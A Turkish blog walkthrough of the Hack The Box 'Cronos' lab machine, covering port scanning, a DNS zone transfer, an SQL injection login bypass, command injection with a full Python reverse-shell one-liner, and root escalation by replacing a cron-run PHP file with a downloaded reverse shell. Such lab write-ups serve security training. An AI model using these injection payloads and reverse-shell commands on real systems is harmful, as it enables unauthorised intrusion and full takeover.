Pazar , 20 Eylül 2020
Home » Cyber Security » Hack The Box – Cronos Çözümü
Hack The Box - Cronos Çözümü 1 – 1 SR8bj8u5qDDM0JZJkxj8qg1

Hack The Box – Cronos Çözümü

Port Tarama

Hedef sistem üzerinde ilk olarak açık portların tespiti için full port taraması gerçekleştirilir.

Full Port Tarama

nmap -Pn -p- — open -vv 10.10.10.13 -oN fullportscan.nmap
Hack The Box - Cronos Çözümü 2 – 0*0bXZMyo2XUdrCgT1?q=20

Açık olan portlar;

22/tcp ssh53/tcp domain80/tcp http

Ardından açık olduğu tespit edilen portlar üzerinde bulunan hizmetlere ait detayların tespiti için versiyon ve script taraması gerçekleştirilir.

Versiyon Tarama

nmap -sV -sC -p 22,53,80 -vv 10.10.10.13 -oN versionscan.nmap
Hack The Box - Cronos Çözümü 3 – 0*2ecWWjECSCwJszh4?q=20

Bilgi Toplama

Port 80

İlgili adresi tarayıcı üzerinden ziyaret ettiğimizde aşağıda ekran görüntüsünde görüldüğü üzere bizi apache server’ın default sayfası ile karşılamaktadır.

Hack The Box - Cronos Çözümü 4 – 0*pURstZs7vD5ao3d3?q=20

Bu aşamada HTTP servisini açık olarak gördüğümüz her noktada gerçekleştirdiğimiz gibi “nikto” aracı ile bilgi toplama işlemi gerçekleştirebiliriz.

Gerçekleştirilen zafiyet tarama işlemine ait ekran görüntüsü aşağıda verilmiştir.

nikto — host=http://10.10.10.13/
Hack The Box - Cronos Çözümü 5 – 0*seUjv7CIjXAwASkz?q=20

Yukarıdaki ekran görüntüsünde de görüleceği üzere burada bize fayda sağlayacak herhangi bir sonuç elde edilememiştir.

Ardından domain adını tespit edebilmek adına “nslookup” aracı ile DNS sorgulaması gerçekleştirilebilir;

nslookupserver 10.10.10.1310.10.10.13
Hack The Box - Cronos Çözümü 6 –

Gerçekleştirilen DNS sorgulaması sonucu “10.10.10.13” adresi için “ns1.cronos.htb” adresinin çözümlendiği gözlemlenmektedir. Bu aşamada “/etc/hosts” dosyasına “cronos.htb” adresini ekleyerek ilgili adrese tarayıcı üzerinden gidilebilir.

Dosya içeriğinin güncellenmesine ait detaylar aşağıda verilmiştir.

nano /etc/hostscat /etc/hosts
Hack The Box - Cronos Çözümü 7 – 1*0Di0 0D8HW10UDnDsty4kQ

İlgili sayfanın tarayıcı üzerinden görüntülenmesine ait ekran görüntüsü aşağıda verilmiştir.

Hack The Box - Cronos Çözümü 8 – 0*cHww21Al8s6Y2hp2?q=20

Söz konusu alan adı için gerçekleştirilen zafiyet taramasına ait detaylar aşağıda verilmiştir.

nikto — host= http://cronos.htb/
Hack The Box - Cronos Çözümü 9 –

Söz konusu alan adı için gerçekleştirilen dizin taramasına ait detaylar aşağıda verilmiştir.

gobuster -u http://cronos.htb/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -s ‘200,204,301,302,307,403,500’ -e -o gobuster
Hack The Box - Cronos Çözümü 10 – 0*XD6carXkhLsOTlqO?q=20

Ancak yukarıda çıkan sonuçlardan da görüldüğü üzere herhangi bir sonuç elde edilmemiştir.

Port 53

Bu aşamada söz konusu hedef sistem üzerinde 53 numaralı port açık olduğundan dolayı “dig” aracını kullanarak ilgili hedefin “DNS zone transfer” ataklarına karşı açık olup olmadığı kontrol edilebilir.

Söz konusu zafiyeti kontrol etmek adına aşağıdaki komut kullanılabilir;

dig axfr @10.10.10.13 cronos.htb
Hack The Box - Cronos Çözümü 11 – 1*BI yKDBeqrZlL6XiNLRfyQ

Yukarıdaki ekran görüntüsünde de görüleceği üzere söz konusu hedef sistem üzerinde DNS zone transfer atağının başarılı olduğu ve sonuçlar incelendiğinde burada “admin.cronos.htb” gibi bir subdomain tespit edildiği gözlemlenebilir.

Ardından ilgili adresi “/etc/hosts” dosyasına eklenebilir.

nano /etc/hostscat /etc/hosts
Hack The Box - Cronos Çözümü 12 – 1*dYBTqwSg7pmSHqzrN2Ocmg

İlgili sayfayı tarayıcı üzerinden ziyaret ettiğimizde aşağıda ekran görüntüsü verilen sayfa ile karşılaşılmaktadır.

Hack The Box - Cronos Çözümü 13 – 0*9WC5r35XZjVZT6Mo?q=20

İlgili panele giriş denemesi sonucu gerçekleştirilen isteğe ve dönen yanıta ait ekran görüntüsü aşağıda verilmiştir.

Hack The Box - Cronos Çözümü 14 – 0*ahlEGd7OYLhMZ99g?q=20

Söz konusu panel üzerinde SQL injection denemeleri ile giriş işlemleri gerçekleştirilebilir. İlgili kullanıcı adı sonuna ‘ (tek tırnak) ifadesi eklenmiş ancak dönen yanıtta herhangi bir değişiklik olmadığı gözlemlenmiştir.

Hack The Box - Cronos Çözümü 15 – 0*P 7s409kqfhIWJVH?q=20

Ardından “ ‘ or 1=1 — ” payloadı ile giriş denemesi gerçekleştirilmiş ve dönen yanıt sonucu incelendiğinde hedef sistem üzerinde login olunabilindiği gözlemlenmiştir.

Hack The Box - Cronos Çözümü 16 – 0*3z3ViRqTYkmDB3QW?q=20

Hedef sistem üzerinde login olduktan sonra karşılaşılan sayfaya ait ekran görüntüsü aşağıda verilmiştir. Aşağıdaki ekran görüntülerinde de görüleceği üzere ilgili sayfa üzerinde komut çalıştırılabilinmektedir.

Hack The Box - Cronos Çözümü 17 – 0*7wwl6TVtz4rndfny?q=20

Hedef sistem üzerinde “python” varlığını tespit etmek adına aşağıdaki komut çalıştırılabilir.

which python
Hack The Box - Cronos Çözümü 18 – 0* ZA5ClvZ84AtNphG?q=20

Zafiyetin İstismarı

Hedef sistem üzerinde python’un varlığını tespit ettikten sonra hedefte aşağıdaki komutu çalıştırabilir ve saldırgan sistem üzerinde bir dinleyici başlatarak reverse shell elde edilebilir.

Hedef sistem üzerinde çalıştırılan komut aşağıdaki gibidir;

8.8.8.8;python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.10”,8989));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
Hack The Box - Cronos Çözümü 19 – 0*jyjdS9Nc6CfQUmZ6?q=20

Saldırgan sistem üzerinde aşağıdaki komutlar kullanılarak öncelikli olarak dinleyici başlatılmış ardından interaktif kabuğa yükseltilmiştir.

nc -lvp 8989python -c ‘import pty; pty.spawn(“/bin/bash”)’CTRL +Zstty raw -echofg
Hack The Box - Cronos Çözümü 20 – 0*sQZnMunE3nBlrhcr?q=20

“user.txt” dosyasının tespitine ve içeriğinin görüntülenmesine ait ekran görüntüsü aşağıda verilmiştir.

Hack The Box - Cronos Çözümü 21 – 0*Qc ZkQFJvJSd1Qrp?q=20

Yetki Yükseltme

Yetki yükseltme işleminde her zaman gerçekleştirildiği gibi hedef sistemde “/tmp” dizini altına “LinEnum.sh” scripti atılabilir. Bu adım için kullanılan komutlar aşağıdaki gibidir;

Saldırgan sistemde başlatılan HTTP server;

python -m SimpleHTTPServer 80

Hedef sisteme ilgili scriptin indirilmesi için çalıştırılan komut;

wget http://10.10.14.10/LinEnum.sh
Hack The Box - Cronos Çözümü 22 – 0*M9tlPhwKDM2KP555?q=20

Söz konusu script hedef sistem üzerinde çalışıtırılmıştır;

./LinEnum.sh
Hack The Box - Cronos Çözümü 23 –

Script’ in çalıştırılması sonucu hedef sistem üzerinde yetki yükseltebileceğimiz birden fazla yöntem bulunmuş ancak bu makale için crontab üzerinden ilerleyeceğiz. Script’in çıktısını incelediğimizde hedef sistem üzerinde “root” tarafından çalıştırılan “artisan” adında bir crontab bulunduğu tespit edilmiştir. Ayrıca bu crontab’ ın izinleri incelendiğinde ise “www-data” kullanıcısı olarak yani bulunduğumuz yetki ile dosyanın çalıştırılabilindiği gözlemlenmiştir. Bu aşamada eğer ilgili dosyanın içeriğini root shell alacak şekilde düzenlersek ve söz konusu crontab root tarafından çalıştırılırsa yetkimizi yükseltmiş olacağız.

İlgili crontab’ın manuel olarak tespiti için aşağıdaki komut da kullanılabilir;

cat /etc/crontab
Hack The Box - Cronos Çözümü 24 –

Söz konusu crontab’a ait dosya içeriğinin görüntülenmesine ait ekran görüntüsü aşağıda verilmiştir.

cat artisan
Hack The Box - Cronos Çözümü 25 – 0*ND7gCAEcfSU eO2Z?q=20

İncelediğimizde crontab içeriğindeki PHP komutunu kullanarak dosyayı çalıştırıyor. Bu durumda içerisine eklediğimiz komut da PHP komutu olmalıdır. Bunun için ilk olarak saldırgan sistemden hedef sistem üzerine “php-reverse-shell” alabileceğimiz shell dosyasını atmalıyız.

Bu aşamada aşağıdaki komutlar kullanılmıştır.

Saldırgan sistem üzerinde;

cp /usr/share/laudanum/php/php-reverse-shell.phpnano php-reverse-shell.phppython -m SimpleHTTPServer 80

Hedef sistem üzerinde;

wget http://10.10.14.10/php-reverse-shell.php
Hack The Box - Cronos Çözümü 26 – 0*44gJe9QTT5KNwE W?q=20

Ardından bulunduğumuz dizinin altını listelediğimizde ilgili dosyanın hedef sistem üzerine aktarıldığını gözlemleyebiliriz.

Hack The Box - Cronos Çözümü 27 – 0*oiOl7r0l8 O1k2uI?q=20

Bu aşamada ilk olarak dosyamızın adını aşağıdaki komutu kullanarak crontab dosyasının adı ile değiştiriyoruz.

mv php-reverse-shell.php artisan
Hack The Box - Cronos Çözümü 28 – 0*Vp2CTRCrRTXrvh5U?q=20

Ardından saldırgan sistem üzerinde dinleyicimizi başlatıyor ve hedefteki crontab dosyasının çalışmasını bekliyoruz.

nc -lvp 9696
Hack The Box - Cronos Çözümü 29 – 0*q6rZBoYnLSjiO7C3?q=20

Yukarıda da görüldüğü üzere hedef sistem üzerinde içeriğini değiştirdiğimiz crontab dosyası çalışmış ve yetkimiz “root” haklarına çıkmıştır.

Son olarak “root.txt” dosyasının yerini tespit ederek içeriğini görüntüleyebiliriz.

Hack The Box - Cronos Çözümü 30 –

Kaynak:

Burcu YARAR

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir